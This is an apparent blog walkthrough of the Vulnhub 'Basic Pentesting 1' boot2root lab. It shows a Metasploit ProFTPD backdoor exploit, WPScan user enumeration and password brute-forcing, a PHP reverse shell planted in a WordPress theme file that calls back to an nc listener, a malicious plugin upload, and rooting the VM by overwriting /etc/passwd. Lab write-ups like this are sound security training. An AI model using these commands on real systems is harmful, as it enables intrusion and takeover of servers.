Today I want to try my first CTF walkthrough. I choose the relatively new Basic Pentesting 1 VM from Vulnhub. This CTF is aimed towards beginners and the goal is to get root privileges (boot2root) on the machine. I will take you with me through my workflow, I consider myself a beginner when it comes to CTF’s as well, so this will be interesting for me.
I won’t explain how you can set up the VM and stuff like this, this is only a walkthrough.
The first thing I usually like to do is running an OpenVAS scan against the target. This is sometimes more and sometimes less effective. This time it straight up revealed our first vulnerability: A nice little ProFTPD Backdoor.
This looks promising. Let’s try to exploit it with Metasploit.
msfconsole search ProFTPD use exploit/unix/ftp/proftpd_133c_backdoor
Bingo! Found something. Let’s set the target’s IP.
set RHOST xxx.xxx.xxx.xxx
And run the exploit.
Boom! Our first root access. That was almost too easy. You can verify with which account you are logged in by typing
Alright, now that we have 1 root access, I have a feeling that everything get’s far more complicated from here. Next thing I did was running a Zenmap scan against the target.
It revealed a couple of open ports:
- 21 – ProFTPD (What we already exploited)
- 22 – OpenSSH
- 80 – HTTP with Apache
Naturally, the first thing we try to do is opening a web browser and trying to access the on port 80.
Hm… Nothing here. I also tried the typical /wp-admin login to see if there is a WordPress installation present. Also negative. I also tried /robots.txt but nothing there either. I have a feeling that there is something hidden tho. Why would there be Apache running if nothing is on it? Let’s dig deeper.
Next thing I did was running Uniscan against it. Check out the results below.
Interesting. This reveals a URL that we might want to have a deeper look at.
Also, some external hosts were found:
That smells like there is some WordPress going on there. Let’s go check the URL first.
And sure enough, http://192.168.1.111/secret/ reveals a WordPress installation!
And a test of http://192.168.1.111/secret/wp-login.php reveals a WP-Login page. Bingo! Now the fun can begin.
Alright, we are a big step further now. The first thing I want to do now is run WPScan against the site to enumerate potential users and find potential vulnerabilities.
wpscan --url http://192.168.1.111/secret/
The WPScan discovers a couple of vulnerabilities:
- WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping – CVE-2017-17094
- WordPress 4.3.0-4.9 – HTML Language Attribute Escaping – CVE-2017-17093
- WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing – CVE-2017-17091
- WordPress 3.7-4.9.1 – MediaElement Cross-Site Scripting (XSS) – CVE-2018-5776
- WordPress <= 4.9.4 – Application Denial of Service (DoS) (unpatched) – CVE-2018-6389
But first, let’s run a user enumeration with WPScan.
wpscan --url http://192.168.1.111/secret/ --enumerate u
Great! Found a Username:
Admin as a username… Why not try admin/admin? Huh? Entering Username and Password redirects us somewhere else, a domain.
That’s weird. Let’s figure out what’s up with that.
All links on the “Secret Blog” redirect to a domain named vtcsec, leaving us with a blank page. So if we want to click on a link on the Secret Blog, we get redirected, for example, to http://vtcsec/secret/index.php/2017/11/16/hello-world/
However, if we replace http://vtcsec/ with http://192.168.1.111/secret/index.php/2017/11/16/hello-word/ we are able to access the site. I don’t know where this will lead us yet but it’s good to know.
Now to be able to run a brute-force attack against the WordPress site without error, we need to add 192.168.1.111 pointing to vtcsec into our hosts file.
We can verify if that worked by clicking on a link on the http://192.168.1.111/secret/ site again. And there we go, hit F5 to refresh the page and it starts loading correctly.
Remember my previous attempt at using admin/admin as a username, where we got redirected to a page not found? Well, I tried it again and look there, the login is admin/admin. We now have access to the Admin Dashboard which gives us a host of new things to try.
But not so fast, what if the password wouldn’t have been admin/admin? We could have used wpscan to brute-force a couple of default passwords against it by running the command below.
wpscan --url http://vtcsec/secret/wp-login.php --username admin --wordlist /usr/share/wordlists/metasploit/http_default_pass.txt --wp-content-dir http://192.168.1.111:80/secret/wp-content/ --threads 50
I used the http_default_pass.txt wordlist and it, sure enough, found the correct password as well.
Now that we have full admin access to WordPress, we can go ahead and use a technique we learned in an earlier article to try to gain access to the Webserver. We are going to add malicious code to the header.php page. I went to /usr/share/webshells/php and copy the code of php-reverse-shell.php
Now I went to Appearance -> Editor -> Theme Header(header.php) in WordPress. I pasted the code at the bottom of the file and changed the IP to my attacking computer. You can delete the code that was in the file before. Also, I changed the port for good measure. Now I updated the file.
Next, I need to start a listener on my attacking computer.
nc -lvp 443
Once that is done, you just open http://http://vtcsec/secret/ once more and you will see that we get a connection on our listener.
We are logged in as the www-data User. Now let’s see if we can leverage this to gain Root access.
Quick answer: I couldn’t. I wasn’t able to elevate my www-data user to higher privileges, so I googled Metasploit + WordPress + plugin, because I knew that I probably have better chances by using a Meterpreter shell and that I have admin access to WordPress, so there should be a way to upload a malicious plugin, and there was.
Using Metasploit to upload a malicious WordPress Plugin
The Metasploit Admin Shell Upload module sounds promising. Firing up Metasploit and configuring the module first.
msfconsole use exploit/unix/webapp/wp_admin_shell_upload
And setting all the options:
Finally run by typing
And boom! We got a Meterpreter shell:
We are still the www-data user, but at least we are able to use some advanced commands with Meterpreter vs. the shell we had before.
Using unix privilege escalation check to analyze the target
Now we will utilize the unix-privesc-check script to see if we can find something. I downloaded the file and placed it in my /var/www/html folder on my ParrotSEC OS. After this, I started apache2.
service apache2 start
Back to the Meterpreter shell, I entered:
First, we are going to get bash using a python script:
python -c 'import pty; pty.spawn("/bin/bash")'
Now we got a proper shell.
We need to go to the tmp folder to be able to download the privesc file with wget.
cd ..\..\.. cd tmp
Now we make the file executable and run it.
chmod +x unix-privesc-check ./unix-privesc-check standard > output.txt
After doing a:
And analyzing our file, one thing catches my eye immediately.
Modifying the passwd file
That should enable us to change the root password somehow. A little research showed that I have to create a new password hash using OpenSSL. First I went back to the Meterpreter shell by typing exit twice.
Now I downloaded the passwd file.
I opened a new terminal and run:
openssl passwd -1 test
Copy the hash and opened the passwd file with nano:
Found the root username and replaced the x with the hash:
And save the file by pressing CTRL + O and CTRL + X
Back to the Meterpreter shell and re-uploading the new passwd file.
upload /root/passwd /etc/
And finally trying to log in with our new password:
shell python -c 'import pty; pty.spawn("/bin/bash")' su root -l whoami
And boom, root access! I have to say, this costs me a lot of research. The key was the privilege escalation script and spending a lot of time searching how to change the password in the passwd file.
This is all I was able to find by myself, there is one more way to gain root access that I learned from another Walkthrough: MySQL credentials that be found in /var/www/html/secret/wp-admin/wp-config.php , but I wasn’t able to figure that out myself. This CTF was a hell of a lot of fun and I highly recommend it for beginners. Working on CTF’s really is beneficial to develop a proper workflow and thinking patterns.